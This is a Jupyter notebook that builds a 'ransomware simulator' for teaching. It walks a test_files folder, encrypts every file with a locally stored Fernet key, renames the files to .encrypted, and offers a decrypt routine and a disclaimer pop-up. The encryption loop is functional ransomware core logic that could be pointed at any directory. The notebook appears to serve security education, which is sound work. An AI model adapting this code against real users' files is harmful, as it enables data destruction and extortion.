# Project 5: Simple Ransomware Simulator (Educational Use Only)

# Problem Statement:
Ransomware has emerged as a pervasive and devastating cybersecurity threat, fundamentally impacting individuals and organizations by encrypting critical data and demanding payment for its release. Understanding the technical mechanisms behind ransomware is crucial for developing effective defensive strategies and fostering cybersecurity awareness.

# Objective:
This project aims to build a simplified ransomware simulator. The core objective is to demonstrate the process of file encryption and subsequent decryption using a cryptographic key. This simulation is designed purely for **ethical, educational, and demonstrative purposes** to illustrate how such malicious software operates, without causing actual harm.

# Technologies Utilized:
* **Python:** The foundational programming language for the simulator.
* **`cryptography` module (specifically `Fernet`):** A robust and secure cryptographic library in Python, providing symmetric encryption (the same key for encryption and decryption).
* **`os` module:** For interacting with the operating system, particularly for navigating file directories and manipulating file paths.
* **`tkinter` (Optional for GUI):** While the core will be CLI-based, `tkinter.messagebox` can be used for disclaimers or simple prompts.

# Expected Outcome:
A Python script that can:
1.  Generate a unique encryption key.
2.  Encrypt all files within a specified target folder (e.g., `test_files/`) using this key.
3.  Append a custom extension (e.g., `.encrypted`) to the encrypted files.
4.  Decrypt the encrypted files using the correct key, restoring them to their original state and removing the custom extension.
5.  Include clear disclaimers about the ethical use of the tool.

# Library Installation and Imports

We need to ensure the `cryptography` library is installed. This library provides the `Fernet` symmetric encryption, which is strong and easy to use for this demonstration. After installation, we'll import all necessary modules.

In [8]:
!pip install cryptography

import os
from cryptography.fernet import Fernet
from tkinter import messagebox # For the disclaimer pop-up

print("Required libraries imported.")
print("Remember to have a 'test_files' folder with dummy files in the same directory.")

Required libraries imported.
Remember to have a 'test_files' folder with dummy files in the same directory.


# Key Generation and Storage

Symmetric encryption requires a key that is used for both encryption and decryption. In a real ransomware scenario, this key would be securely sent to a remote server. For our simulation, we will generate a key and save it to a file (`key.key`). This file will be crucial for decrypting the files later.

**Note:** In a real attack, this key would NOT be stored locally. Here, it's stored for demonstration purposes to allow decryption.

In [9]:
def generate_key():
    """Generates a Fernet key and saves it to a file."""
    key = Fernet.generate_key()
    with open("key.key", "wb") as key_file:
        key_file.write(key)
    print(f"Encryption key generated and saved to 'key.key'.")
    return key

def load_key():
    """Loads the Fernet key from the 'key.key' file."""
    try:
        return open("key.key", "rb").read()
    except FileNotFoundError:
        print("[-] Error: 'key.key' not found. Please ensure the key has been generated.")
        return None

# Generate a key if it doesn't exist, or load it
if not os.path.exists("key.key"):
    encryption_key = generate_key()
else:
    print("'key.key' already exists. Loading existing key.")
    encryption_key = load_key()

# Initialize Fernet object with the key
if encryption_key:
    f = Fernet(encryption_key)
    print("Fernet object initialized with the key.")
else:
    print("Could not initialize Fernet object. Key not available.")

'key.key' already exists. Loading existing key.
Fernet object initialized with the key.


# File Encryption and Decryption Functions

These functions handle the core logic of the ransomware simulator:
* **`encrypt_file(file_path)`:** Reads the content of a file, encrypts it using the loaded `Fernet` key, overwrites the original file with the encrypted data, and appends a `.encrypted` extension.
* **`decrypt_file(file_path)`:** Reads the encrypted content of a file, decrypts it using the same `Fernet` key, overwrites the encrypted file with the original data, and removes the `.encrypted` extension.

In [10]:
def encrypt_file(file_path):
    """Encrypts a single file using the global Fernet object 'f'."""
    try:
        with open(file_path, "rb") as file:
            original_data = file.read()
        encrypted_data = f.encrypt(original_data)
        with open(file_path, "wb") as file:
            file.write(encrypted_data)
        os.rename(file_path, file_path + ".encrypted") # Add .encrypted extension
        print(f"[+] Encrypted: {file_path}")
    except Exception as e:
        print(f"[-] Error encrypting {file_path}: {e}")

def decrypt_file(file_path):
    """Decrypts a single file using the global Fernet object 'f'."""
    try:
        with open(file_path, "rb") as file:
            encrypted_data = file.read()
        decrypted_data = f.decrypt(encrypted_data)
        
        # Remove the .encrypted extension
        if file_path.endswith(".encrypted"):
            original_file_path = file_path[:-len(".encrypted")]
        else:
            original_file_path = file_path # If no .encrypted, just use original path

        with open(original_file_path, "wb") as file:
            file.write(decrypted_data)
        
        # Remove the encrypted file if it was renamed
        if file_path.endswith(".encrypted"):
            os.remove(file_path) # Delete the .encrypted file
        
        print(f"[+] Decrypted: {original_file_path}")
    except Exception as e:
        print(f"[-] Error decrypting {file_path}: {e}")

# Ransomware Simulation Logic

This section contains the main logic to traverse the target directory (`test_files/`) and apply either encryption or decryption to the files.

* **`TARGET_DIRECTORY`:** Specifies the folder containing the files to be processed. **ENSURE THIS IS YOUR `test_files` FOLDER!**
* The script iterates through all files in the target directory.
* Based on user choice, it calls either `encrypt_file` or `decrypt_file` for each file.

In [21]:
# Define the target directory containing the files for simulation
TARGET_DIRECTORY = "test_files" # Assumes 'test_files' is in the same directory as the notebook

def run_simulation(mode):
    """
    Runs the encryption or decryption simulation on files in the TARGET_DIRECTORY.
    mode: 'encrypt' or 'decrypt'
    """
    if not os.path.exists(TARGET_DIRECTORY):
        print(f"[-] Error: Target directory '{TARGET_DIRECTORY}' not found.")
        print("Please create a 'test_files' folder in the same directory as this notebook and put some dummy files in it.")
        return

    print(f"\n--- Starting {mode.capitalize()}ion of files in '{TARGET_DIRECTORY}' ---")
    
    files_processed = 0
    for root, _, files in os.walk(TARGET_DIRECTORY):
        for file in files:
            file_path = os.path.join(root, file)
            
            # Avoid encrypting/decrypting the key itself or hidden files
            if file == "key.key" or file.startswith('.'):
                continue
            
            if mode == 'encrypt':
                if not file.endswith(".encrypted"): # Only encrypt if not already encrypted
                    encrypt_file(file_path)
                    files_processed += 1
            elif mode == 'decrypt':
                if file.endswith(".encrypted"): # Only decrypt if it is encrypted
                    decrypt_file(file_path)
                    files_processed += 1
            else:
                print("Invalid mode. Use 'encrypt' or 'decrypt'.")
                return

    print(f"--- Finished {mode.capitalize()}ion. {files_processed} files processed. ---")

# Main Execution and User Interaction

This is the main block that controls the flow of the ransomware simulator.
* It first displays an **important disclaimer** using a Tkinter message box. This step requires Tkinter, which is usually included with Python.
* It then prompts the user to choose whether to `encrypt` or `decrypt` files.
* It calls the `run_simulation` function based on the user's choice.

In [19]:
def show_disclaimer():
    """Displays a critical disclaimer message box."""
    messagebox.showwarning(
        "CRITICAL DISCLAIMER: Educational Use Only",
        "This program is a SIMULATOR for EDUCATIONAL PURPOSES ONLY.\n\n"
        "DO NOT use this on any real, important files or systems.\n"
        "ALWAYS use dummy files in a designated 'test_files' folder.\n"
        "Unauthorized use is illegal and unethical."
    )

# Show the disclaimer before proceeding
show_disclaimer()

# Get user input for action
user_action = input("Enter 'encrypt' to encrypt files or 'decrypt' to decrypt files: ").lower()

if user_action == 'encrypt':
    run_simulation('encrypt')
elif user_action == 'decrypt':
    run_simulation('decrypt')
else:
    print("Invalid action. Please enter 'encrypt' or 'decrypt'.")

print("\nSimulation complete.")

Enter 'encrypt' to encrypt files or 'decrypt' to decrypt files:  decrypt



--- Starting Decryption of files in 'test_files' ---
[+] Decrypted: test_files\dummy1.txt
[+] Decrypted: test_files\dummy2.txt
[+] Decrypted: test_files\.ipynb_checkpoints\dummy1-checkpoint.txt
[+] Decrypted: test_files\.ipynb_checkpoints\dummy2-checkpoint.txt
[+] Decrypted: test_files\.ipynb_checkpoints\untitled-checkpoint.txt
--- Finished Decryption. 5 files processed. ---

Simulation complete.


# Conceptual Output / Simulation Results

The simulation involves two main stages: encryption and decryption. Both stages are confirmed by console output and by observing the changes in the `test_files` directory.

# Disclaimer Pop-up:
Upon running the main execution cell, a critical disclaimer is displayed via a pop-up window to ensure the user understands the educational nature and potential risks of the simulation.

![Ransomware Disclaimer Pop-up](ransomware_disclaimer_popup.png)

# Encryption Phase:
When the 'encrypt' option is chosen, the script iterates through the files in the `test_files` directory, encrypting each one and appending the `.encrypted` extension.
**File System View After Encryption:**
After encryption, the files in `test_files` directory will have the `.encrypted` extension.

![Files Encrypted Screenshot](files_encrypted_screenshot.png)

# Decryption Phase:
When the 'decrypt' option is chosen (after files have been encrypted), the script reads the encrypted files, decrypts them, and restores their original names by removing the `.encrypted` extension.

**File System View After Decryption:**
After decryption, the files in `test_files` directory will revert to their original names and content.

![Files Decrypted Screenshot](files_decrypted_screenshot.png)


In [14]:
import os

target_dir = "test_files"

if os.path.exists(target_dir):
    print(f"'{target_dir}' folder exists.")

    files_in_test_dir = [f for f in os.listdir(target_dir) if os.path.isfile(os.path.join(target_dir, f))]

    if files_in_test_dir:
        print(f"Files found in '{target_dir}':")
        for file_name in files_in_test_dir:
            file_path = os.path.join(target_dir, file_name)
            file_size = os.path.getsize(file_path)
            print(f"  - {file_name} (Size: {file_size} bytes)")
    else:
        print(f"'{target_dir}' folder is empty or contains only subdirectories.")
else:
    print(f"Error: '{target_dir}' folder does NOT exist at {os.getcwd()}\\{target_dir}")

'test_files' folder exists.
Files found in 'test_files':
  - dummy1.txt (Size: 149 bytes)
  - dummy2.txt (Size: 123 bytes)


# Conclusion - Project 5: Simple Ransomware Simulator

This project successfully developed a simple yet illustrative ransomware simulator using Python and the `cryptography` module. By demonstrating the processes of key generation, file encryption, and subsequent decryption, the project provides a practical insight into the fundamental mechanisms employed by real-world ransomware. The emphasis on using dummy files and a clear ethical disclaimer highlights the critical importance of responsible and educational use of such powerful tools. This simulation serves as an effective educational demo, fostering greater awareness of cybersecurity threats and the significance of strong data protection measures.